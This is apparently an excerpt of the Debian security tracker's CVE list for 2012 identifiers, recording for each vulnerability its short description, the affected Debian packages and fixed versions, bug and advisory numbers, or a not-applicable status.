CVE-2012-3696 (CRLF injection vulnerability in WebKit in Apple Safari before 6.0 ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3695 (Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3694 (WebKit in Apple Safari before 6.0 does not properly handle ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3693 (Incomplete blacklist vulnerability in WebKit in Apple Safari before ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3692 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3691 (WebKit in Apple Safari before 6.0 does not properly handle Cascading ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3690 (WebKit in Apple Safari before 6.0 does not properly handle ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3689 (WebKit in Apple Safari before 6.0 does not properly handle ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3688 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3687 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3686 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3685 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3684 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3683 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3682 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3681 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3680 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3679 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3678 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3677 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3676 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3675 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3674 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3673 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3672 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3671 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3670 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3669 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3668 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3667 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3666 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3665 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3664 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3663 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3662 RESERVED CVE-2012-3661 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3660 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3659 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3658 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3657 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3656 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3655 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3654 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3653 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3652 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3651 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3650 (WebKit in Apple Safari before 6.0 accesses uninitialized memory ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3649 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3648 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3647 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3646 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3645 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3644 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3643 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3642 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3641 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3640 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3639 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3638 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3637 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3636 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3635 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3634 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3633 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3632 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3631 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3630 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3629 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3628 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3627 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3626 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3625 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3624 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3623 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3622 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3621 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3620 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3619 RESERVED CVE-2012-3618 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3617 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3616 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3615 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3614 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3613 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3612 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3611 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3610 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3609 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3608 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3607 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3606 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3605 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3604 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3603 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3602 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3601 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3600 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3599 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3598 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3597 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3596 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3595 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3594 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3593 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3592 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3591 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3590 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3589 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...) NOT-FOR-US: Apple iTunes / Safari; if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3588 (Directory traversal vulnerability in preview.php in the Plugin ...) NOT-FOR-US: Wordpress plugin CVE-2012-3587 (APT 0.7.x before 0.7.25 and 0.8.x before 0.8.16, when using the ...) - apt (unimportant) NOTE: net-update is disabled by default on Debian CVE-2012-3586 RESERVED CVE-2012-3585 (Heap-based buffer overflow in jpeg_ls.dll in the Jpeg_LS (aka JLS) ...) NOT-FOR-US: IrfanView PlugIns CVE-2012-3584 RESERVED CVE-2012-3583 RESERVED CVE-2012-3582 (Symantec PGP Universal Server 3.2.x before 3.2.1 MP2 does not properly ...) NOT-FOR-US: Symantec PGP Universal Server CVE-2012-3581 (Symantec Messaging Gateway (SMG) before 10.0 allows remote attackers ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3580 (Symantec Messaging Gateway (SMG) before 10.0 allows remote ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3579 (Symantec Messaging Gateway (SMG) before 10.0 has a default password ...) NOT-FOR-US: Symantec Messaging Gateway CVE-2012-3578 (Unrestricted file upload vulnerability in html/Upload.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2012-3577 (Unrestricted file upload vulnerability in doupload.php in the Nmedia ...) NOT-FOR-US: Wordpress plugin CVE-2012-3576 (Unrestricted file upload vulnerability in php/upload.php in the ...) NOT-FOR-US: Wordpress plugin CVE-2012-3575 (Unrestricted file upload vulnerability in uploader.php in the RBX ...) NOT-FOR-US: Wordpress plugin CVE-2012-3574 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: Wordpress plugin CVE-2012-3573 RESERVED CVE-2012-3572 (Open Source Competency Center (OSCC) MyMeeting 3.0.1 and earlier, and ...) NOT-FOR-US: Open Source Competency Center (OSCC) MyMeeting CVE-2011-5094 (** DISPUTED ** Mozilla Network Security Services (NSS) 3.x, with ...) NOTE: Disputed NSS issue CVE-2012-3571 (ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows ...) {DSA-2519-2 DSA-2519-1 DSA-2516-1} - isc-dhcp 4.2.4-2 (bug #686174) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3570 (Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is ...) - isc-dhcp 4.2.4-2 (bug #686174) [squeeze] - isc-dhcp (Vulnerable code not present) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3569 (Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used ...) NOT-FOR-US: VMware OVF Tool CVE-2012-3568 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3567 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3566 (Opera before 12.00 Beta allows user-assisted remote attackers to cause ...) NOT-FOR-US: Opera CVE-2012-3565 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3564 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3563 (Opera before 12.00 Beta allows remote attackers to cause a denial of ...) NOT-FOR-US: Opera CVE-2012-3562 (Opera before 12.00 Beta allows user-assisted remote attackers to cause ...) NOT-FOR-US: Opera CVE-2012-3561 (Opera before 11.64 does not properly allocate memory for URL strings, ...) NOT-FOR-US: Opera CVE-2012-3560 (Opera before 11.65 does not ensure that the address field corresponds ...) NOT-FOR-US: Opera CVE-2012-3559 (Unspecified vulnerability in Opera before 12.00 on Mac OS X has ...) NOT-FOR-US: Opera CVE-2012-3558 (Opera before 11.65 does not ensure that the address field corresponds ...) NOT-FOR-US: Opera CVE-2012-3557 (Opera before 11.65 does not properly restrict the reading of JSON ...) NOT-FOR-US: Opera CVE-2012-3556 (Opera before 11.65 does not properly restrict the opening of a pop-up ...) NOT-FOR-US: Opera CVE-2012-3555 (Opera before 11.65 does not ensure that keyboard sequences are ...) NOT-FOR-US: Opera CVE-2012-3554 (SQL injection vulnerability in the RSGallery2 (com_rsgallery2) ...) NOT-FOR-US: Joomla addon CVE-2012-3552 (Race condition in the IP implementation in the Linux kernel before 3.0 ...) {DSA-2668-1} - linux 3.0-1 - linux-2.6 CVE-2012-3551 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: Crowbar CVE-2012-3550 RESERVED CVE-2012-3549 (The SCTP implementation in FreeBSD 8.2 allows remote attackers to ...) - kfreebsd-8 8.3-5 (bug #686961) - kfreebsd-9 9.0-7 (bug #686962) - kfreebsd-10 10.0~svn242489-1 (bug #686963) NOTE: http://www.exploit-db.com/exploits/20226/ CVE-2012-3548 (The dissect_drda function in epan/dissectors/packet-drda.c in ...) - wireshark 1.8.2-2 (unimportant; bug #686225) [squeeze] - wireshark (Vulnerable code not present) NOTE: Doesn't allow code injection NOTE: debian changelog contains CVE-2012-5239, but this was rejected in favour of CVE-2012-3548 CVE-2012-3547 (Stack-based buffer overflow in the cbtls_verify function in FreeRADIUS ...) {DSA-2546-1} - freeradius 2.1.12+dfsg-1.1 (medium; bug #687175) CVE-2012-3546 (org/apache/catalina/realm/RealmBase.java in Apache Tomcat 6.x before ...) - tomcat7 7.0.28-4 (bug #695251) - tomcat6 6.0.35-6 (bug #695250) CVE-2012-3545 RESERVED CVE-2012-3544 [Chunked transfer encoding extension size is not limited] RESERVED - tomcat6 - tomcat7 7.0.30 CVE-2012-3543 RESERVED - mono 2.10.8.1-7 (bug #686562) CVE-2012-3542 (OpenStack Keystone, as used in OpenStack Folsom before folsom-rc1 and ...) - keystone 2012.1.1-5 CVE-2012-3541 RESERVED CVE-2012-3540 (Open redirect vulnerability in views/auth_forms.py in OpenStack ...) - horizon 2012.1.1-4 (bug #686050) CVE-2012-3539 REJECTED CVE-2012-3538 (Pulp in Red Hat CloudForms before 1.1 logs administrative passwords in ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-3537 (The Crowbar Ohai plugin ...) NOT-FOR-US: crowbar ohai plugin NOTE: https://github.com/SUSE-Cloud/barclamp-deployer/commit/b6454268a067fc77ff5de82057b5b53b3cc38b87 CVE-2012-3536 RESERVED CVE-2012-3535 (Heap-based buffer overflow in OpenJPEG 1.5.0 and earlier allows remote ...) {DSA-2629-1} - openjpeg 1.3+dfsg-4.6 (bug #685970) CVE-2012-3534 (GNU Gatekeeper before 3.1 does not limit the number of connections to ...) - gnugk 2:3.0.2-3 (bug #685969) CVE-2012-3533 (The python SDK before 3.1.0.6 and CLI before 3.1.0.8 for oVirt 3.1 ...) NOT-FOR-US: ovirt CVE-2012-3532 (Cross-site request forgery (CSRF) vulnerability in the GateIn Portal ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-3531 (Cross-site scripting (XSS) vulnerability in the Install Tool in TYPO3 ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3530 (Incomplete blacklist vulnerability in the t3lib_div::quoteJSvalue API ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3529 (The configuration module in the backend in TYPO3 4.5.x before 4.5.19, ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3528 (Multiple cross-site scripting (XSS) vulnerabilities in the backend in ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3527 (view_help.php in the backend help system in TYPO3 4.5.x before 4.5.19, ...) {DSA-2537-1} - typo3-src 4.5.19+dfsg1-1 (bug #685011) CVE-2012-3526 (The reverse proxy add forward module (mod_rpaf) 0.5 and 0.6 for the ...) {DSA-2532-1} - libapache2-mod-rpaf 0.6-1 (bug #683984) CVE-2012-3525 (s2s/out.c in jabberd2 2.2.16 and earlier does not verify that a ...) - jabberd2 (bug #685666) CVE-2012-3524 (libdbus 1.5.x and earlier, when used in setuid or other privileged ...) - dbus 1.6.8-1 (bug #689070) [squeeze] - dbus 1.2.24-4+squeeze2 - glib2.0 2.33.12+really2.32.4-2 [squeeze] - glib2.0 (Vulnerable code not present) NOTE: fixed in 2.34.0-1 from experimental NOTE: http://www.openwall.com/lists/oss-security/2012/09/12/6 NOTE: https://bugzilla.novell.com/show_bug.cgi?id=697105 NOTE: http://stealth.openwall.net/null/dzug.c CVE-2012-3523 (The STARTTLS implementation in nnrpd in INN before 2.5.3 does not ...) - inn (STARTTLS was introduced in 2.3, see bug #685581) - inn2 2.5.3-1 (low; bug #685581) [squeeze] - inn2 (Minor issue) CVE-2012-3522 [geshi XSS in contrib/langwiz.php] RESERVED - geshi (Vulnerable code not present, see bug #685323) [squeeze] - geshi (shipped as example/.gz) CVE-2012-3521 [geshi information disclosure in contrib/cssgen.php] RESERVED - geshi 1.0.8.4-2 (bug #685324) [squeeze] - geshi 1.0.8.4-1+squeeze1 CVE-2012-3520 (The Netlink implementation in the Linux kernel before 3.2.30 does not ...) - linux 3.2.29-1 - linux-2.6 (Introduced in 3.1) CVE-2012-3519 (routerlist.c in Tor before 0.2.2.38 uses a different amount of time ...) {DSA-2548-1} - tor 0.2.3.20-rc-1 (low) CVE-2012-3518 (The networkstatus_parse_vote_from_string function in routerparse.c in ...) {DSA-2548-1} - tor 0.2.3.20-rc-1 (low) CVE-2012-3517 (Use-after-free vulnerability in dns.c in Tor before 0.2.2.38 might ...) - tor 0.2.3.20-rc-1 (low) [squeeze] - tor (Minor issue) CVE-2012-3516 (The GNTTABOP_swap_grant_ref sub-operation in the grant table hypercall ...) - xen (Only affects >= 4.2) CVE-2012-3515 (Qemu, as used in Xen 4.0, 4.1 and possibly other products, when ...) {DSA-2545-1 DSA-2543-1 DSA-2542-1} - xen 4.1.3-2 (bug #686764) [squeeze] - xen (Vulnerable code not present) - xen-qemu-dm-4.0 - qemu 1.1.2+dfsg-1 - qemu-kvm 1.1.2+dfsg-1 CVE-2012-3514 (OCaml Xml-Light Library before r234 computes hash values without ...) - xml-light 2.2-15 (low; bug #685584) [squeeze] - xml-light (Minor issue) CVE-2012-3513 (munin-cgi-graph in Munin before 2.0.6, when running as a CGI module ...) - munin 2.0.6-1 (bug #684076) [squeeze] - munin (vulnerable code introduced in 2.x) NOTE: http://www.munin-monitoring.org/ticket/1238 CVE-2012-3512 (Munin before 2.0.6 stores plugin state files that run as root in the ...) - munin 2.0.6-1 (bug #684075) NOTE: http://www.munin-monitoring.org/ticket/1234 CVE-2012-3511 (Multiple race conditions in the madvise_remove function in ...) - linux 3.2.23-1 - linux-2.6 [squeeze] - linux-2.6 2.6.32-47 CVE-2012-3510 (Use-after-free vulnerability in the xacct_add_tsk function in ...) - linux 2.6.20-1 - linux-2.6 2.6.20-1 CVE-2012-3509 (Multiple integer overflows in the (1) _objalloc_alloc function in ...) - binutils 2.22-8 (low; bug #688951) [squeeze] - binutils (Minor issue) CVE-2012-4668 (Cross-site scripting (XSS) vulnerability in Roundcube Webmail 0.8.1 ...) - roundcube 0.7.2-4 (bug #685475) [squeeze] - roundcube (Vulnerable code not present) NOTE: http://trac.roundcube.net/ticket/1488613 CVE-2012-3508 (Cross-site scripting (XSS) vulnerability in program/lib/washtml.php in ...) - roundcube 0.7.2-4 (bug #685475) 